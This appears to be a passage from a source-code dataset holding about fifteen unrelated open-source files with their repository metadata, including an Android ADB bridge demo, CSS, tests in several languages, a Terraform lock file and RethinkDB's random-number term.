\CommandLoop term.dec(result) term.str(string(" Aborted",13,10,13,10)) waitcnt(cnt+ constant(_clkfreq)) pri CommandLoop cmd (string("logcat -c",13,10),1,false) cmd (string("logcat -v raw iPBRo:* *:S",13,10),1,false) cmd (string("echo \$PD,254,9999 > /sqlite_stmt_journals/iPBRo",13,10),0,false) cmd (string("chmod 666 /sqlite_stmt_journals/iPBRo",13,10),0,false) repeat repeat result := adb.rx if (result) ' can this be done better? if (adb.id==1) if (strsize(adb.rxbuf)>1) 'term.tx("{") 'term.dec(adb.id) 'term.tx("|") 'term.dec(strsize(adb.rxbuf)) 'term.tx("}") term.str(adb.rxbuf) adb.rxclr until result==0 chin := term.rxcheck if (chin>-1) inbuf.tx(chin) if (chin==13 or inbuf.remaining < 80) if (byte[@inbufmem]=="~") ' allow access to shell just in case: ~reboot allows restarting the phone even without root! adb.str(@inbufmem+1,0) inbuf.zap(0) else outbuf.str(string("echo ")) byte[@inbufmem+strsize(@inbufmem)-1]~ ' remove crlf outbuf.str(@inbufmem) outbuf.str(string(" >> /sqlite_stmt_journals/iPBRo",13,10)) adb.str(@outbufmem,0) inbuf.zap(0) outbuf.zap(0) pri cmd(what, who,echo) adb.str(what,who) result~~ repeat result := adb.rx if (echo) term.tx("{") term.dec(adb.id) term.tx("}") term.str(adb.rxbuf) adb.rxclr until result==0 var long chin byte inbufmem[128] byte outbufmem[128]
Propeller Spin
4
deets/propeller
libraries/community/p1/All/ADB bridge beta (Also contains android and source)/spin/adb-demo-io.spin
[ "MIT" ]
#region license // Copyright (c) 2004, Rodrigo B. de Oliveira (rbo@acm.org) // All rights reserved. // // Redistribution and use in source and binary forms, with or without modification, // are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name of Rodrigo B. de Oliveira nor the names of its // contributors may be used to endorse or promote products derived from this // software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND // ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED // WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF // THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #endregion import System.IO def RemoveNotice(fname, notice): contents = File.ReadAllText(fname) newContents = contents.Replace(notice, "") if contents != newContents: print(fname) File.WriteAllText(fname, newContents) def ScanDirectory(name as string, notice as string): for fname in Directory.GetFiles(name, "*.cs"): RemoveNotice(fname, notice) for fname in Directory.GetFiles(name, "*.boo"): RemoveNotice(fname, notice) for dir in Directory.GetDirectories(name): ScanDirectory(dir, notice) notice = File.ReadAllText(argv[0]) ScanDirectory(".", notice)
Boo
4
popcatalin81/boo
scripts/removenotice.boo
[ "BSD-3-Clause" ]
/* Copyright (c) Microsoft Corporation. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ :root { --box-shadow: rgba(0, 0, 0, 0.133) 0px 1.6px 3.6px 0px, rgba(0, 0, 0, 0.11) 0px 0.3px 0.9px 0px; --monospace-font: "SF Mono", Monaco, Consolas, "Droid Sans Mono", Inconsolata, "Courier New",monospace; --box-shadow-thick: rgb(0 0 0 / 10%) 0px 1.8px 1.9px, rgb(0 0 0 / 15%) 0px 6.1px 6.3px, rgb(0 0 0 / 10%) 0px -2px 4px, rgb(0 0 0 / 15%) 0px -6.1px 12px, rgb(0 0 0 / 25%) 0px 6px 12px; } * { box-sizing: border-box; min-width: 0; min-height: 0; } svg { fill: currentColor; } .vbox { display: flex; flex-direction: column; flex: auto; position: relative; } .hbox { display: flex; flex: auto; position: relative; } .d-flex { display: flex !important; } .d-inline { display: inline !important; } .m-1 { margin: 4px; } .m-2 { margin: 8px; } .m-3 { margin: 16px; } .m-4 { margin: 24px; } .m-5 { margin: 32px; } .mx-1 { margin: 0 4px; } .mx-2 { margin: 0 8px; } .mx-3 { margin: 0 16px; } .mx-4 { margin: 0 24px; } .mx-5 { margin: 0 32px; } .my-1 { margin: 4px 0; } .my-2 { margin: 8px 0; } .my-3 { margin: 16px 0; } .my-4 { margin: 24px 0; } .my-5 { margin: 32px 0; } .mt-1 { margin-top: 4px; } .mt-2 { margin-top: 8px; } .mt-3 { margin-top: 16px; } .mt-4 { margin-top: 24px; } .mt-5 { margin-top: 32px; } .mr-1 { margin-right: 4px; } .mr-2 { margin-right: 8px; } .mr-3 { margin-right: 16px; } .mr-4 { margin-right: 24px; } .mr-5 { margin-right: 32px; } .mb-1 { margin-bottom: 4px; } .mb-2 { margin-bottom: 8px; } .mb-3 { margin-bottom: 16px; } .mb-4 { margin-bottom: 24px; } .mb-5 { margin-bottom: 32px; } .ml-1 { margin-left: 4px; } .ml-2 { margin-left: 8px; } .ml-3 { margin-left: 16px; } .ml-4 { margin-left: 24px; } .ml-5 { margin-left: 32px; } .p-1 { padding: 4px; } .p-2 { padding: 8px; } .p-3 { padding: 16px; } .p-4 { padding: 24px; } .p-5 { padding: 32px; } .px-1 { padding: 0 4px; } .px-2 { padding: 0 8px; } .px-3 { padding: 0 16px; } .px-4 { padding: 0 24px; } .px-5 { padding: 0 32px; } .py-1 { padding: 4px 0; } .py-2 { padding: 8px 0; } .py-3 { padding: 16px 0; } .py-4 { padding: 24px 0; } .py-5 { padding: 32px 0; } .pt-1 { padding-top: 4px; } .pt-2 { padding-top: 8px; } .pt-3 { padding-top: 16px; } .pt-4 { padding-top: 24px; } .pt-5 { padding-top: 32px; } .pr-1 { padding-right: 4px; } .pr-2 { padding-right: 8px; } .pr-3 { padding-right: 16px; } .pr-4 { padding-right: 24px; } .pr-5 { padding-right: 32px; } .pb-1 { padding-bottom: 4px; } .pb-2 { padding-bottom: 8px; } .pb-3 { padding-bottom: 16px; } .pb-4 { padding-bottom: 24px; } .pb-5 { padding-bottom: 32px; } .pl-1 { padding-left: 4px; } .pl-2 { padding-left: 8px; } .pl-3 { padding-left: 16px; } .pl-4 { padding-left: 24px; } .pl-5 { padding-left: 32px; } .no-wrap { white-space: nowrap !important; } .float-left { float: left !important; } article, aside, details, figcaption, figure, footer, header, main, menu, nav, section { display: block; } .form-control, .form-select { padding: 5px 12px; font-size: 14px; line-height: 20px; color: var(--color-fg-default); vertical-align: middle; background-color: var(--color-canvas-default); background-repeat: no-repeat; background-position: right 8px center; border: 1px solid var(--color-border-default); border-radius: 6px; outline: none; box-shadow: var(--color-primer-shadow-inset); } .input-contrast { background-color: var(--color-canvas-inset); } .subnav-search { position: relative; flex: auto; display: flex; } .subnav-search-input { flex: auto; padding-left: 32px; color: var(--color-fg-muted); } .subnav-search-icon { position: absolute; top: 9px; left: 8px; display: block; color: var(--color-fg-muted); text-align: center; pointer-events: none; } .subnav-search-context + .subnav-search { margin-left: -1px; } .subnav-item { flex: none; position: relative; float: left; padding: 5px 10px; font-weight: 500; line-height: 20px; color: var(--color-fg-default); border: 1px solid var(--color-border-default); } .subnav-item:hover { background-color: var(--color-canvas-subtle); } .subnav-item:first-child { border-top-left-radius: 6px; border-bottom-left-radius: 6px; } .subnav-item:last-child { border-top-right-radius: 6px; border-bottom-right-radius: 6px; } .subnav-item + .subnav-item { margin-left: -1px; } .counter { display: inline-block; min-width: 20px; padding: 0 6px; font-size: 12px; font-weight: 500; line-height: 18px; color: var(--color-fg-default); text-align: center; background-color: var(--color-neutral-muted); border: 1px solid transparent; border-radius: 2em; } .color-icon-success { color: var(--color-success-fg) !important; } .color-text-danger { color: var(--color-danger-fg) !important; } .color-text-warning { color: var(--color-checks-step-warning-text) !important; } .color-fg-muted { color: var(--color-fg-muted) !important; } .octicon { display: inline-block; overflow: visible !important; vertical-align: text-bottom; fill: currentColor; margin-right: 7px; flex: none; } @media only screen and (max-width: 600px) { .subnav-item, .form-control { border-radius: 0 !important; } .subnav-item { padding: 5px 3px; border: none; } }
CSS
3
burner/playwright
packages/html-reporter/src/common.css
[ "Apache-2.0" ]
/* * * Copyright 2015 gRPC authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ #include "test/cpp/qps/usage_timer.h" #include <fstream> #include <sstream> #include <string> #include <grpc/support/log.h> #include <grpc/support/time.h> #ifdef __linux__ #include <sys/resource.h> #include <sys/time.h> static double time_double(struct timeval* tv) { return tv->tv_sec + 1e-6 * tv->tv_usec; } #endif UsageTimer::UsageTimer() : start_(Sample()) {} double UsageTimer::Now() { auto ts = gpr_now(GPR_CLOCK_REALTIME); return ts.tv_sec + 1e-9 * ts.tv_nsec; } static void get_resource_usage(double* utime, double* stime) { #ifdef __linux__ struct rusage usage; getrusage(RUSAGE_SELF, &usage); *utime = time_double(&usage.ru_utime); *stime = time_double(&usage.ru_stime); #else *utime = 0; *stime = 0; #endif } static void get_cpu_usage(unsigned long long* total_cpu_time, unsigned long long* idle_cpu_time) { #ifdef __linux__ std::ifstream proc_stat("/proc/stat"); proc_stat.ignore(5); std::string cpu_time_str; std::string first_line; std::getline(proc_stat, first_line); std::stringstream first_line_s(first_line); for (int i = 0; i < 10; ++i) { std::getline(first_line_s, cpu_time_str, ' '); *total_cpu_time += std::stol(cpu_time_str); if (i == 3) { *idle_cpu_time = std::stol(cpu_time_str); } } #else // Use the parameters to avoid unused-parameter warning (void)total_cpu_time; (void)idle_cpu_time; gpr_log(GPR_INFO, "get_cpu_usage(): Non-linux platform is not supported."); #endif } UsageTimer::Result UsageTimer::Sample() { Result r; r.wall = Now(); get_resource_usage(&r.user, &r.system); r.total_cpu_time = 0; r.idle_cpu_time = 0; get_cpu_usage(&r.total_cpu_time, &r.idle_cpu_time); return r; } UsageTimer::Result UsageTimer::Mark() const { Result s = Sample(); Result r; r.wall = s.wall - start_.wall; r.user = s.user - start_.user; r.system = s.system - start_.system; r.total_cpu_time = s.total_cpu_time - start_.total_cpu_time; r.idle_cpu_time = s.idle_cpu_time - start_.idle_cpu_time; return r; }
C++
5
mpminardi/grpc
test/cpp/qps/usage_timer.cc
[ "Apache-2.0" ]
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="javascript" data-joplin-source-open="```javascript&#10;" data-joplin-source-close="&#10;```">function() { console.info('bonjour'); }</pre><pre class="hljs"><code><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) { <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">info</span>(<span class="hljs-string">&#x27;bonjour&#x27;</span>); }</code></pre></div>
HTML
2
asahiocean/joplin
packages/app-cli/tests/md_to_html/code_block.html
[ "MIT" ]
import "regent" require("src/RegentParticleDSL") set_dimensionality(3) set_periodicity(true) disable_high_performance() enable_timing() setup_part() local format = require("std/format") fspace part{ core_part_space : core_part, neighbour_part_space : neighbour_part, a : int32[4] } setup_dsl() require("src/io_modules/empty_io/import_empty_io") function mover(part1, config) local kernel = rquote part1.core_part_space.pos_x = part1.core_part_space.pos_x + 1.0 end return kernel end local c_stdio = terralib.includec("stdio.h") task main() [initialisation_function(variables, 2, 2.5, 2.5, 2.5)]; variables.particle_array[0].a[0] = 34; variables.particle_array[0].a[1] = 512; variables.particle_array[0].a[2] = 256; variables.particle_array[0].core_part_space.cutoff = 0.5 variables.particle_array[0].core_part_space.pos_x = 0.5 variables.particle_array[0].core_part_space.pos_y = 0.5 variables.particle_array[0].core_part_space.pos_z = 0.5 variables.particle_array[1].a[0] = 34; variables.particle_array[1].a[1] = 512; variables.particle_array[1].a[2] = 256; variables.particle_array[1].core_part_space.cutoff = 0.5 variables.particle_array[1].core_part_space.pos_x = 0.5 variables.particle_array[1].core_part_space.pos_y = 1.0 variables.particle_array[1].core_part_space.pos_z = 0.5 [neighbour_init.initialise(variables)]; [neighbour_init.update_cells(variables)]; for part in neighbour_init.padded_particle_array.ispace do if not neighbour_init.check_valid(neighbour_init.padded_particle_array[part].neighbour_part_space) then neighbour_init.padded_particle_array[part].a[0] = 123; neighbour_init.padded_particle_array[part].a[1] = 123; neighbour_init.padded_particle_array[part].a[2] = 123; neighbour_init.padded_particle_array[part].core_part_space.pos_z = 0.0 end end [invoke(variables.config, {mover, PER_PART}, BARRIER)]; --for part in neighbour_init.padded_particle_array.ispace do -- if not neighbour_init.check_valid(neighbour_init.padded_particle_array[part].neighbour_part_space) then -- neighbour_init.padded_particle_array[part].a[0] = 123; -- neighbour_init.padded_particle_array[part].a[1] = 123; -- neighbour_init.padded_particle_array[part].a[2] = 123; -- end --end for part in neighbour_init.padded_particle_array do if neighbour_init.check_valid(neighbour_init.padded_particle_array[part].neighbour_part_space) then regentlib.assert(neighbour_init.padded_particle_array[part].a[0] == 34, "Failed to find value 34 in a[0]") regentlib.assert(neighbour_init.padded_particle_array[part].a[1] == 512,"Failed to find value 512 in a[1]") regentlib.assert(neighbour_init.padded_particle_array[part].a[2] == 256, "Failed to find value 256 in a[2]") else regentlib.assert(neighbour_init.padded_particle_array[part].a[0] == 123 or neighbour_init.padded_particle_array[part].core_part_space.pos_z== 0.5, "Value wrong in invalid particle") regentlib.assert(neighbour_init.padded_particle_array[part].a[1] == 123 or neighbour_init.padded_particle_array[part].core_part_space.pos_z== 0.5, "Value wrong in invalid particle") regentlib.assert(neighbour_init.padded_particle_array[part].a[2] == 123 or neighbour_init.padded_particle_array[part].core_part_space.pos_z== 0.5, "Value wrong in invalid particle") end end for part in neighbour_init.padded_particle_array.ispace do if neighbour_init.check_valid(neighbour_init.padded_particle_array[part].neighbour_part_space) then format.println("Setting {}", part) neighbour_init.padded_particle_array[part].a[0] = 13 neighbour_init.padded_particle_array[part].a[1] = 13 neighbour_init.padded_particle_array[part].a[2] = 13 end end for part in neighbour_init.padded_particle_array.ispace do if (not neighbour_init.check_valid(neighbour_init.padded_particle_array[part].neighbour_part_space)) and neighbour_init.padded_particle_array[part].core_part_space.pos_z== 0.5 then format.println("Checking {}",part) regentlib.assert(neighbour_init.padded_particle_array[part].a[0] == 34, "Failed at the side-effect check") regentlib.assert(neighbour_init.padded_particle_array[part].a[1] == 512, "Failed at the side-effect check") regentlib.assert(neighbour_init.padded_particle_array[part].a[2] == 256, "Failed at the side-effect check") end end end run_DSL(main)
Rouge
3
stfc/RegentParticleDSL
tests/zero_part/test_copy.rg
[ "MIT" ]
--TEST-- Test typed properties with integer keys --FILE-- <?php #[AllowDynamicProperties] class T { // Class must have at least one property. Property must have a type. // Empty class or untyped property removes segfault public int $i; } $t = new T; // $x must be undefined or a non-string type $x = 1; $t->$x = 2; $t->$x--; var_dump($t); ?> --EXPECT-- object(T)#1 (1) { ["i"]=> uninitialized(int) ["1"]=> int(1) }
PHP
4
NathanFreeman/php-src
Zend/tests/type_declarations/typed_properties_086.phpt
[ "PHP-3.01" ]
class Foo { Obj? test1() { return f(this)?.i(1) } Obj? test2() { return f(this)?.i(null) } Obj? test3() { return f(null)?.i(3) } Obj? test4() { return f(null)?.i(null) } Obj? test5() { return f(this)?.j(5) } Obj? test6() { return f(null)?.j(6) } Obj? test7() { last = null; f(this)?.j(7); return last } Obj? test8() { last = null; f(null)?.j(8); return last } Obj? test9() { q = 9; return f(this)?.q } Obj? test10() { q = 10; return f(null)?.q } Foo? f(Foo? x) { return x } Int? i(Int? x) { return last = x } Int j(Int x) { return last = x } Int? last Int q }
Fantom
2
fanx-dev/fanx
compiler/testCompilerx/res/misc/testSafe.fan
[ "AFL-3.0" ]
# This file is maintained automatically by "terraform init". # Manual edits may be lost in future updates. provider "registry.terraform.io/hashicorp/aws" { version = "3.52.0" constraints = "~> 3.52" hashes = [ "h1:Fy/potyWfS8NVumHqWi6STgaQUX66diUmgZDfFNBeXU=", "zh:04a4f8a1b34292fd6a72c1efe03f6f10186ecbdc318df36d462d0be1c21ce72d", "zh:0601006f14f437489902555720dd8fb4e67450356438bab64b61cf6d0e1af681", "zh:14214e996b8db0a2038b74a2ddbea7356b3e53f73003cde2c9069294d9a6c421", "zh:17d1ecc280d776271b0fc0fd6a4033933be8e67eb6a39b7bfb3c242cd218645f", "zh:247ae4bc3b52fba96ed1593e7b23d62da0d2c99498fc0d968fcf28020df3c3aa", "zh:2e0432fabeb5e44d756a5566168768f1b6dea3cc0e5650fac966820e90d18367", "zh:34f6f95b88c5d8c105d9a3b7d2712e7df1181948bfbef33bb6a87d7a77c20c0d", "zh:3de6bf02b9499bf8dc13843da72a03db5ae8188b8157f0e7b3d5bf1d7cd1ac8b", "zh:43198a223ea6d6dfb82deac62b29181c3be18dc77b9ef9f8d44c32b08e44ea5c", "zh:a7de44c9445c100a2823c371df03fcaa9ecb1642750ccdc02294fa6cd1095859", "zh:c3c44bd07e5b6cdb776ff674e39feb708ba3ee3d0dff2c88d1d5db323094d942", ] } provider "registry.terraform.io/hashicorp/local" { version = "2.1.0" hashes = [ "h1:KfieWtVyGWwplSoLIB5usKAUnrIkDQBkWaR5TI+4WYg=", "zh:0f1ec65101fa35050978d483d6e8916664b7556800348456ff3d09454ac1eae2", "zh:36e42ac19f5d68467aacf07e6adcf83c7486f2e5b5f4339e9671f68525fc87ab", "zh:6db9db2a1819e77b1642ec3b5e95042b202aee8151a0256d289f2e141bf3ceb3", "zh:719dfd97bb9ddce99f7d741260b8ece2682b363735c764cac83303f02386075a", "zh:7598bb86e0378fd97eaa04638c1a4c75f960f62f69d3662e6d80ffa5a89847fe", "zh:ad0a188b52517fec9eca393f1e2c9daea362b33ae2eb38a857b6b09949a727c1", "zh:c46846c8df66a13fee6eff7dc5d528a7f868ae0dcf92d79deaac73cc297ed20c", "zh:dc1a20a2eec12095d04bf6da5321f535351a594a636912361db20eb2a707ccc4", "zh:e57ab4771a9d999401f6badd8b018558357d3cbdf3d33cc0c4f83e818ca8e94b", "zh:ebdcde208072b4b0f8d305ebf2bfdc62c926e0717599dcf8ec2fd8c5845031c3", "zh:ef34c52b68933bedd0868a13ccfd59ff1c820f299760b3c02e008dc95e2ece91", ] } provider "registry.terraform.io/hashicorp/random" { version = "3.1.0" hashes = [ "h1:rKYu5ZUbXwrLG1w81k7H3nce/Ys6yAxXhWcbtk36HjY=", "zh:2bbb3339f0643b5daa07480ef4397bd23a79963cc364cdfbb4e86354cb7725bc", "zh:3cd456047805bf639fbf2c761b1848880ea703a054f76db51852008b11008626", "zh:4f251b0eda5bb5e3dc26ea4400dba200018213654b69b4a5f96abee815b4f5ff", "zh:7011332745ea061e517fe1319bd6c75054a314155cb2c1199a5b01fe1889a7e2", "zh:738ed82858317ccc246691c8b85995bc125ac3b4143043219bd0437adc56c992", "zh:7dbe52fac7bb21227acd7529b487511c91f4107db9cc4414f50d04ffc3cab427", "zh:a3a9251fb15f93e4cfc1789800fc2d7414bbc18944ad4c5c98f466e6477c42bc", "zh:a543ec1a3a8c20635cf374110bd2f87c07374cf2c50617eee2c669b3ceeeaa9f", "zh:d9ab41d556a48bd7059f0810cf020500635bfc696c9fc3adab5ea8915c1d886b", "zh:d9e13427a7d011dbd654e591b0337e6074eef8c3b9bb11b2e39eaaf257044fd7", "zh:f7605bd1437752114baf601bdf6931debe6dc6bfe3006eb7e9bb9080931dca8a", ] }
HCL
3
tetianakravchenko/beats
x-pack/filebeat/input/awss3/_meta/terraform/.terraform.lock.hcl
[ "ECL-2.0", "Apache-2.0" ]
require "spec" {% if flag?(:musl) %} # FIXME: These thread specs occasionally fail on musl/alpine based ci, so # they're disabled for now to reduce noise. # See https://github.com/crystal-lang/crystal/issues/8738 pending Thread {% skip_file %} {% end %} describe Thread do it "allows passing an argumentless fun to execute" do a = 0 thread = Thread.new { a = 1; 10 } thread.join a.should eq(1) end it "raises inside thread and gets it on join" do thread = Thread.new { raise "OH NO" } expect_raises Exception, "OH NO" do thread.join end end it "returns current thread object" do current = nil thread = Thread.new { current = Thread.current } thread.join current.should be(thread) current.should_not be(Thread.current) ensure # avoids a "GC Warning: Finalization cycle" caused by *current* # referencing the thread itself, preventing the finalizer to run: current = nil end it "yields the processor" do done = false thread = Thread.new do 3.times { Thread.yield } done = true end until done Thread.yield end thread.join end end
Crystal
5
n00p3/crystal
spec/std/thread_spec.cr
[ "Apache-2.0" ]
"use strict"; var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault"); Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon")); var _jsxRuntime = require("react/jsx-runtime"); var _default = (0, _createSvgIcon.default)( /*#__PURE__*/(0, _jsxRuntime.jsx)("path", { d: "M5.68 18.32c-.42.42-1.12.39-1.5-.08C2.82 16.53 2 14.36 2 12c0-2.04.61-3.93 1.66-5.51L2.1 4.93a.9959.9959 0 0 1 0-1.41c.39-.39 1.02-.39 1.41 0l16.97 16.97c.39.39.39 1.02 0 1.41s-1.02.39-1.41 0L8.14 10.96c-.09.33-.14.68-.14 1.04 0 .8.24 1.55.64 2.17.27.41.24.94-.1 1.29-.43.43-1.17.4-1.51-.11C6.38 14.4 6 13.24 6 12c0-.93.21-1.8.58-2.59L5.11 7.94C4.4 9.13 4 10.52 4 12c0 1.89.66 3.63 1.76 5 .32.39.28.96-.08 1.32zm9.78-9.78c-.35.35-.37.88-.11 1.29.41.62.65 1.37.65 2.17 0 .36-.05.71-.14 1.04l1.55 1.55c.38-.79.59-1.66.59-2.59 0-1.24-.38-2.4-1.03-3.36-.34-.5-1.07-.54-1.51-.1zm2.86-2.86c-.36.36-.4.92-.08 1.32 1.1 1.37 1.76 3.11 1.76 5 0 1.48-.4 2.87-1.11 4.06l1.45 1.45C21.39 15.93 22 14.04 22 12c0-2.36-.82-4.53-2.18-6.24-.38-.47-1.08-.5-1.5-.08z" }), 'SensorsOffRounded'); exports.default = _default;
JavaScript
3
good-gym/material-ui
packages/material-ui-icons/lib/SensorsOffRounded.js
[ "MIT" ]
// Copyright 2010-2015 RethinkDB, all rights reserved. #include <algorithm> #include <limits> #include <cmath> #include "math.hpp" #include "rdb_protocol/datum_stream/array.hpp" #include "rdb_protocol/op.hpp" #include "rdb_protocol/term.hpp" #include "rdb_protocol/math_utils.hpp" #include "rdb_protocol/terms/terms.hpp" namespace ql { class sample_term_t : public op_term_t { public: sample_term_t(compile_env_t *env, const raw_term_t &term) : op_term_t(env, term, argspec_t(2)) { } scoped_ptr_t<val_t> eval_impl(scope_env_t *env, args_t *args, eval_flags_t) const { int64_t num_int = args->arg(env, 1)->as_int(); rcheck(num_int >= 0, base_exc_t::LOGIC, strprintf("Number of items to sample must be non-negative, got `%" PRId64 "`.", num_int)); const size_t num = num_int; rcheck(num <= env->env->limits().array_size_limit(), base_exc_t::RESOURCE, format_array_size_error(env->env->limits().array_size_limit()).c_str()); counted_t<table_t> t; counted_t<datum_stream_t> seq; scoped_ptr_t<val_t> v = args->arg(env, 0); if (v->get_type().is_convertible(val_t::type_t::SELECTION)) { counted_t<selection_t> t_seq = v->as_selection(env->env); t = t_seq->table; seq = t_seq->seq; } else { seq = v->as_seq(env->env); } std::vector<datum_t> result; result.reserve(num); size_t element_number = 0; batchspec_t batchspec = batchspec_t::user(batch_type_t::TERMINAL, env->env); { profile::sampler_t sampler("Sampling elements.", env->env->trace); datum_t row; while (row = seq->next(env->env, batchspec), row.has()) { element_number++; if (result.size() < num) { result.push_back(row); } else { /* We have a limitation on the size of arrays that makes * sure they are less than the size of an integer. */ size_t new_index = randint(element_number); if (new_index < num) { result[new_index] = row; } } sampler.new_sample(); } } std::random_shuffle(result.begin(), result.end()); counted_t<datum_stream_t> new_ds( new array_datum_stream_t(datum_t(std::move(result), env->env->limits()), backtrace())); return t.has() ? new_val(make_counted<selection_t>(t, new_ds)) : new_val(env->env, new_ds); } virtual deterministic_t is_deterministic() const { return deterministic_t::no(); } virtual const char *name() const { return "sample"; } }; class random_term_t : public op_term_t { public: random_term_t(compile_env_t *env, const raw_term_t &term) : op_term_t(env, term, argspec_t(0, 2), optargspec_t({"float"})) { } private: virtual deterministic_t is_deterministic() const { return deterministic_t::no(); } enum class bound_type_t { LOWER, UPPER }; int64_t convert_bound(double bound, bound_type_t type) const { int64_t res; bool success = number_as_integer(bound, &res); rcheck(success, base_exc_t::LOGIC, strprintf("%s bound (%" PR_RECONSTRUCTABLE_DOUBLE ") could not be safely converted to an integer.", type == bound_type_t::LOWER ? "Lower" : "Upper", bound)); return res; } virtual scoped_ptr_t<val_t> eval_impl(scope_env_t *env, args_t *args, eval_flags_t) const { scoped_ptr_t<val_t> use_float_arg = args->optarg(env, "float"); bool use_float = use_float_arg ? use_float_arg->as_bool() : args->num_args() == 0; if (use_float) { double lower = 0.0; double upper = 1.0; if (args->num_args() == 0) { // Use default bounds } else if (args->num_args() == 1) { upper = args->arg(env, 0)->as_num(); } else { r_sanity_check(args->num_args() == 2); lower = args->arg(env, 0)->as_num(); upper = args->arg(env, 1)->as_num(); } bool range_scaled = false; double result; // Range may overflow, so check for that case if ((lower > 0.0) != (upper > 0.0) && std::abs(lower) > (std::numeric_limits<double>::max() / 2) - std::abs(upper)) { // Do the random generation on half the range, then scale it later range_scaled = true; lower = lower / 4.0; upper = upper / 4.0; } result = lower + (randdouble() * (upper - lower)); // The roll above can result in the upper value. If this happens, we // return the lower value, which keeps things fair. if (upper > lower ? result >= upper : result <= upper) { result = lower; } if (range_scaled) { result = result * 4.0; } return new_val(datum_t(result)); } else { rcheck(args->num_args() > 0, base_exc_t::LOGIC, "Generating a random integer requires one or two bounds."); int64_t lower; int64_t upper; // Load the lower and upper values, and reject the query if we could // lose precision when putting the result in a datum_t (double) if (args->num_args() == 1) { lower = 0; upper = convert_bound(args->arg(env, 0)->as_num(), bound_type_t::UPPER); } else { r_sanity_check(args->num_args() == 2); lower = convert_bound(args->arg(env, 0)->as_num(), bound_type_t::LOWER); upper = convert_bound(args->arg(env, 1)->as_num(), bound_type_t::UPPER); } rcheck(lower < upper, base_exc_t::LOGIC, strprintf("Lower bound (%" PRIi64 ") is not less than upper bound (%" PRIi64 ").", lower, upper)); // This stuff is to ensure a uniform distribution // Round range up to the nearest power of two uint64_t range = upper - lower; uint64_t max_rand = uint64_round_up_to_power_of_two(range); uint64_t result; do { result = randuint64(max_rand); } while (result >= range); int64_t signed_result = lower; signed_result += result; return new_val(datum_t(safe_to_double(signed_result))); } } virtual const char *name() const { return "random"; } }; counted_t<term_t> make_sample_term( compile_env_t *env, const raw_term_t &term) { return make_counted<sample_term_t>(env, term); } counted_t<term_t> make_random_term( compile_env_t *env, const raw_term_t &term) { return make_counted<random_term_t>(env, term); } } // namespace ql
C++
5
zadcha/rethinkdb
src/rdb_protocol/terms/random.cc
[ "Apache-2.0" ]
if application "VOX" is running then tell application "VOX" if player state is 1 then return (get artist) & " – " & (get track) else return "" end if end tell end if return ""
AppleScript
4
FedorZaytsev/MTMR
MTMR/AppleScripts/Vox.nowPlaying.scpt
[ "MIT" ]
^XA ^FT100,820^BQI,2,10 ^FH\^FDLA,#TAG_URL^FS ^FB300,1,0,C^FT380,100^A0R,61,59^FH\^FD#TAG_CODE^FS ^FO360,0^GB0,500,3^FS ^FB450,1,0,C^FT305,20^A0R,51,49^FH\^FD#PART_NUMBER^FS ^FO280,0^GB0,500,3^FS ^FB450,5,0,C^FT40,20^A0R,41,39^FH\^FD#PART_DESCRPTION^FS ^FO0,500^GB460,0,3^FS ^XZ
Zimpl
3
WPR-Engineering/part-box
config/default-large.zpl
[ "Apache-2.0" ]
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.spark.sql.execution.streaming import java.util.UUID import org.apache.hadoop.conf.Configuration import org.scalatest.BeforeAndAfter import org.apache.spark.sql.SparkSession import org.apache.spark.sql.catalyst.expressions.{GenericInternalRow, UnsafeProjection, UnsafeRow} import org.apache.spark.sql.execution.streaming.state.{HDFSBackedStateStoreProvider, RocksDBStateStoreProvider, StateStore, StateStoreConf, StateStoreId, StateStoreProviderId, StreamingSessionWindowStateManager} import org.apache.spark.sql.internal.SQLConf import org.apache.spark.sql.streaming.StreamTest import org.apache.spark.sql.types.{IntegerType, LongType, StringType, StructType} import 